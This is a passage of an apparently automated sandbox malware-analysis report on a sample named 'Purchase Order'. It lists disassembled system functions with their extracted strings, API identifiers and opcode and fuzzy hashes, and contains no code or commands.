                                              • Instruction Fuzzy Hash: 9C32CFB86493118FE764CF18C49072FBBE5EF88794F504A1EF8959B2A0E774D980CB52
                                              Function 34815702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 514348c567a54ccfdf055cda6db884377e90010a97aeb7fe4667985ba4b8b864
                                              • Instruction ID: 6f7ab8a2e8f1694b4a883c8728a0432b91157a2e737d078f29a9e7bd6f192fa1
                                              • Opcode Fuzzy Hash: 514348c567a54ccfdf055cda6db884377e90010a97aeb7fe4667985ba4b8b864
                                              • Instruction Fuzzy Hash: A031EF35302B06EFE7819F68CA90A89FBA9FF45354F405626E81097B50DBB4E820DBD0
                                              Function 3482F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$$
                                              • API String ID: 3446177414-233714265
                                              • Opcode ID: 8dd43becba87a505b6dca0e18678d28440baa12cefd40a5adb9ef3797590ccbc
                                              • Instruction ID: 52397894b2c2e37000e9e9737777c39ab0a549ab3d5a033f711de9720ce26603
                                              • Opcode Fuzzy Hash: 8dd43becba87a505b6dca0e18678d28440baa12cefd40a5adb9ef3797590ccbc
                                              • Instruction Fuzzy Hash: 3D61AF75E00749DFEB11CFA8C580B9DFBB1FF44708F504269D6256B640CBB4A981EB90
                                              Function 348A35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                              • API String ID: 0-118005554
                                              • Opcode ID: b0f40c1ef82b4b0a42ea4104c8725ae2f0261e022079740a3f13cecad2842378
                                              • Instruction ID: f152e9d0a82cafff635817b4e2713b000ec2caeddca1ec99692d3979781d2c9b
                                              • Opcode Fuzzy Hash: b0f40c1ef82b4b0a42ea4104c8725ae2f0261e022079740a3f13cecad2842378
                                              • Instruction Fuzzy Hash: 3531BA752087419FE301CB68D854B2AB7E4EF84750F080A6AFC50CB391EBB4D845CB92
                                              Function 348434B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                              Download Yara Rule
                                              Strings
                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 34882A95
                                              • RtlpInitializeAssemblyStorageMap, xrefs: 34882A90
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                              • API String ID: 0-2653619699
                                              • Opcode ID: eda525daba2d13ec6a1c67a81e0a5398f80c597b513f3f63be4ba4371a2dbadc
                                              • Instruction ID: 9977f4f721f248205fa4bfdab8860fafba8d34508e227a7dbd5af0710fb7149c
                                              • Opcode Fuzzy Hash: eda525daba2d13ec6a1c67a81e0a5398f80c597b513f3f63be4ba4371a2dbadc
                                              • Instruction Fuzzy Hash: E911E9B6B00208FFF7258A8CDD41FAB76AD9F94B54F54816DB904EB380D675CD4086A0
                                              Function 3484A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: Cleanup Group$Threadpool!
                                              • API String ID: 2994545307-4008356553
                                              • Opcode ID: acbb64d5fd949ae33b027ac49c4dfc1af612d90c6cbae1c08716e1d16c6cfea2
                                              • Instruction ID: a75c71692bacb81527a660c7738ffda3dc5727d10e397300a64c9156e98c5992
                                              • Opcode Fuzzy Hash: acbb64d5fd949ae33b027ac49c4dfc1af612d90c6cbae1c08716e1d16c6cfea2
                                              • Instruction Fuzzy Hash: 4B01D1B2104708AFE351CF14CD46B6677E8EB44B15F018A79A658CB290E774D844CF4A
                                              Function 3481C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: MUI
                                              • API String ID: 0-1339004836
                                              • Opcode ID: b40917722cb2d6c2d6b85b79ecadbbace372b538590e3c0f53ca8a84d1ca1de8
                                              • Instruction ID: bc90434dec281c7b590ed8ffef7aa82fbb4c7eb9f32fdac77bb2b2ef4afe14f0
                                              • Opcode Fuzzy Hash: b40917722cb2d6c2d6b85b79ecadbbace372b538590e3c0f53ca8a84d1ca1de8
                                              • Instruction Fuzzy Hash: DB824E79E003589FEB14CFA9C881B9DB7B5BF48354F10826AD859AB350DB70AD81CF50
                                              Function 348BA118 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: fc375b18032a95f901e28feb2d6967414048d36a7cd4573433e46b6e62cca100
                                              • Instruction ID: 7d257112e9d3112bebfa5decb7de06f4ef3cbeb10049bea1e68b8c37e9d457d6
                                              • Opcode Fuzzy Hash: fc375b18032a95f901e28feb2d6967414048d36a7cd4573433e46b6e62cca100
                                              • Instruction Fuzzy Hash: 8D22ABB82047558FEB14CF29C0903B6BBE1EF45340F44869ED8D68B786EB35E582CB64
                                              Function 348165D0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e06c7623c3ed701064dca57c714368d98ed57b742a65fc36202b1b1c19690080
                                              • Instruction ID: d1e20b3e0889c4f77c31c44d90296ec039ef6191fd8359d64fd553862a07a609
                                              • Opcode Fuzzy Hash: e06c7623c3ed701064dca57c714368d98ed57b742a65fc36202b1b1c19690080
                                              • Instruction Fuzzy Hash: ADE1AD75608345CFD305CF28C090A5ABBE4FF89354F058B6EE899AB361DB31E945CB92
                                              Function 34811131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: d071b418486137d5f1bb4b130332137925cdde56653ef81514b01b0c0c5befcf
                                              • Instruction ID: de4428300edb84e38df94241f68d58b8d95232e46d18a7177b40d3d6fc996491
                                              • Opcode Fuzzy Hash: d071b418486137d5f1bb4b130332137925cdde56653ef81514b01b0c0c5befcf
                                              • Instruction Fuzzy Hash: F7B112B56093408FD394CF28C580A1AFBF1BF88708F544A6EE999DB352D775E845CB42
                                              Function 3484F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc667ab953e54d8f86d68573bed9c6942cf84865a2e93b8fc56c12373c9c69d5
                                              • Instruction ID: 98a8f481c10c75d85f350144f6531ca7f5e2d0cb4a67d35b670eee5f9fd5c7c7
                                              • Opcode Fuzzy Hash: fc667ab953e54d8f86d68573bed9c6942cf84865a2e93b8fc56c12373c9c69d5
                                              • Instruction Fuzzy Hash: D1410AB4D01288DFEB60CFA9C880AAEBBF4FB49344F50826ED959A7311D7319945CF64
                                              Function 3481262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 10700bceb534c71b88f40c317ba69216452d6a8c079da83cc7c2baa373a95bf6
                                              • Instruction ID: 9ebf4a3043ee8c0b6a16e80ecb49101e45d83445c540ba4ebbc6d9dd7647acd9
                                              • Opcode Fuzzy Hash: 10700bceb534c71b88f40c317ba69216452d6a8c079da83cc7c2baa373a95bf6
                                              • Instruction Fuzzy Hash: 87418E75A01704DFE721DF68C940A4ABBF6FF48354F1087AAC526AB6A0DB70E981CF51
                                              Function 348907C3 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 50fda74e759299808ccead71a41f71e7a88fe753728ee2a8f2e7485bc334cfa9
                                              • Instruction ID: 9376491e106dc33904eb0ad3daf2e8063076b964030ef7e458ed648bc43e1dfe
                                              • Opcode Fuzzy Hash: 50fda74e759299808ccead71a41f71e7a88fe753728ee2a8f2e7485bc334cfa9
                                              • Instruction Fuzzy Hash: 55415EB16083049FE360DF29C844B9BBBE8FF88664F004B2AF5A8D7250D7709945DB92
                                              Function 348157C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 6b156b175a8474215e7a0362e2caae12875a34ccca15845290ec68cb2782e754
                                              • Instruction ID: e9a5815ddbe2fc88a1e593f787fa6b53ef76e536b81b010d905c51326557631e
                                              • Opcode Fuzzy Hash: 6b156b175a8474215e7a0362e2caae12875a34ccca15845290ec68cb2782e754
                                              • Instruction Fuzzy Hash: 4631AD35716A09FFE7819B68CE50A9ABBA6FF45340F40522AEC1087B50DB74E830DB80
                                              Function 34813616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: e47af19fca5ee35fdb2fb0904279bd83afb09c23291b3ca042bc713f4e42bbac
                                              • Instruction ID: 2936db20d9b6ef2ea984ca5289d8d702db9f51a07da4e72eb5c7d7cf9dad3ebf
                                              • Opcode Fuzzy Hash: e47af19fca5ee35fdb2fb0904279bd83afb09c23291b3ca042bc713f4e42bbac
                                              • Instruction Fuzzy Hash: 6421FDB52057549FF7219F18CA84B1ABBA4FFC1B20F414A6EE9405B660CBB0EC84CF81
                                              Function 3489A4B0 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: fb77f82b5bb5d13c0f2988f057700a347b7ec67512635673dce774f7c17353ff
                                              • Instruction ID: 0f8bc5623b1dc747788c6aefe2495fd31d50ebc96b57648b8897cc73dcd66bf4
                                              • Opcode Fuzzy Hash: fb77f82b5bb5d13c0f2988f057700a347b7ec67512635673dce774f7c17353ff
                                              • Instruction Fuzzy Hash: 1A014936211659ABDF529E84C840EDA3FA6FB4C764F068215FE1866220C636D9B1EF81
                                              Function 3484A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: GlobalTags
                                              • API String ID: 0-1106856819
                                              • Opcode ID: 44e13b1288863a4860a63cc50d05b05c5fe11b2c68fd877b770ca122cd473dc7
                                              • Instruction ID: 84f8fac9c8165b591185031354376fe87c8573565edf432dccb00c0dcb46722a
                                              • Opcode Fuzzy Hash: 44e13b1288863a4860a63cc50d05b05c5fe11b2c68fd877b770ca122cd473dc7
                                              • Instruction Fuzzy Hash: E4714BB9E0030EDFEB58DF98D59069DBBB1BF48750F10822EE805BB250DB719941CB90
                                              Function 3489F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: ad200ca859f885c0e1a3e25109151c89108cf32f6a54a55232162c83674939fc
                                              • Instruction ID: 004c5391811d69287435df418d6ab59ff1b0892ef900450f42923403819fd9ac
                                              • Opcode Fuzzy Hash: ad200ca859f885c0e1a3e25109151c89108cf32f6a54a55232162c83674939fc
                                              • Instruction Fuzzy Hash: 62517DB2604B05AFE7168F58C840FABB7E8FB84754F400A2DBA5497290DBB4ED04CB91
                                              Function 3482E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: EXT-
                                              • API String ID: 0-1948896318
                                              • Opcode ID: c31172f31564daadc222119d89eaca1610bcba9fb2dd4425fcd2d3f42881f6f7
                                              • Instruction ID: 55faa93331942d257420f5dfcafb804b588307cdc714b24ab28ff472303b0c45
                                              • Opcode Fuzzy Hash: c31172f31564daadc222119d89eaca1610bcba9fb2dd4425fcd2d3f42881f6f7
                                              • Instruction Fuzzy Hash: 8D4190B6509301AFE710CA74C880B6BB7E8AF9C754F440B2DF994D7140EB74DA84C79A
                                              Function 3488C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryHash
                                              • API String ID: 0-2202222882
                                              • Opcode ID: 78a5a8ecc065a1eef5491065fcf9c9d4fad186751b29c27afef0bc4ae38b5a17
                                              • Instruction ID: faf7c878f8eb1c13966045ccb8b2d76a9ee39a8ea023cef7d2c20cdc5a793539
                                              • Opcode Fuzzy Hash: 78a5a8ecc065a1eef5491065fcf9c9d4fad186751b29c27afef0bc4ae38b5a17
                                              • Instruction Fuzzy Hash: E44141B1D4152CEFEB21CB64CC80FDE77BCAB44714F4046E5AA18AB150DB709E898FA4
                                              Function 348997A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: verifier.dll
                                              • API String ID: 0-3265496382
                                              • Opcode ID: 00ce31bb642d06850b46db2c26ad62c85dc21605112603ba000fb5c42fd63193
                                              • Instruction ID: 0fc2fddef3e2e236efca88f0638349b3730efa4c84806fddeb8f7ec3aef678cf
                                              • Opcode Fuzzy Hash: 00ce31bb642d06850b46db2c26ad62c85dc21605112603ba000fb5c42fd63193
                                              • Instruction Fuzzy Hash: F831A5B9710701AFEB54DF289850BA677E9EF48750F90817EE508EF780E6718C829F94
                                              Function 34847505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #
                                              • API String ID: 0-1885708031
                                              • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                              • Instruction ID: 8f95ad1ee7dc708f150ae875a09b6dfee8138fc71f4bef9bcc59f1d84c15348e
                                              • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                              • Instruction Fuzzy Hash: C941AE7AA0061AEFEB11CF48C890BBEB7B5EF44741F01465AE955AB340EB34D941CBE1
                                              Function 348436EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Flst
                                              • API String ID: 0-2374792617
                                              • Opcode ID: ac80b1c73ae849695491677ea6b2d464ef663f322f4ef320fdde2a3aa0ec664a
                                              • Instruction ID: 9d1f8dc1e69fa9b1b77975037087d2cc25b0be10c34f4c4efb1d165de5ea7128
                                              • Opcode Fuzzy Hash: ac80b1c73ae849695491677ea6b2d464ef663f322f4ef320fdde2a3aa0ec664a
                                              • Instruction Fuzzy Hash: A64187B5606305DFE304CF18C580A16FBE8EB89750F90866EE499CF381EB71D986CB91
                                              Function 34809730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
